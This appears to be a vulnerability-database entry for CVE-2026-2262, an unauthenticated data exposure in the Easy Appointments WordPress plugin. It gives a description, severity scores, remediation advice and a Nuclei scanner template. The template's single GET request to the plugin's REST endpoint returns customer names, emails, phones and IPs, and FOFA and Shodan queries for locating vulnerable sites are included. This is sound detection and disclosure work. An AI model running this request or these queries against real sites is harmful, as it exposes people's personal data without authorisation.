/Vulnerability Library

Easy Appointments <= 3.12.21 - Information Disclosure

CVE-2026-2262
Verified

Description

Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data.

Severity

High

CVSS Score

7.5

Exploit Probability

43%

Published Date

April 21, 2026

Template Author

0x_akoko

CVE-2026-2262.yaml
id: CVE-2026-2262

info:
  name: Easy Appointments <= 3.12.21 - Information Disclosure
  author: 0x_Akoko
  severity: high
  description: |
   Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data.
  impact: |
   Unauthenticated attackers can access sensitive customer data, including names, emails, phone numbers, IPs, descriptions, and pricing, risking privacy and data leakage.
  remediation: |
   Update to the latest version of Easy Appointments plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments/easy-appointments-31221-unauthenticated-sensitive-information-exposure-via-rest-api
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2262
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2262
    epss-score: 0.43441
    epss-percentile: 0.9756
    cwe-id: CWE-284
    cpe: cpe:2.3:a:motopress:easy_appointments:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/easy-appointments/"
    shodan-query: http.html:"/wp-content/plugins/easy-appointments/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,exposure,easy-appointments

http:
  - raw:
      - |
        GET /wp-json/wp/v2/eablocks/ea_appointments/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'email', 'phone', 'ip', 'name')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502205e9c003f2ed9ecc8e935da00ff48f29b95f418b9cc302a3cdfa84e63f5685bbb0221009107a395ad7e84c85240c9c684de81b2a9b749582427d5e8176a1c0da1e85b84:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-2262
CWE ID:
cwe-284

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments/easy-appointments-31221-unauthenticated-sensitive-information-exposure-via-rest-apihttps://nvd.nist.gov/vuln/detail/CVE-2026-2262

Remediation Steps

Update to the latest version of Easy Appointments plugin.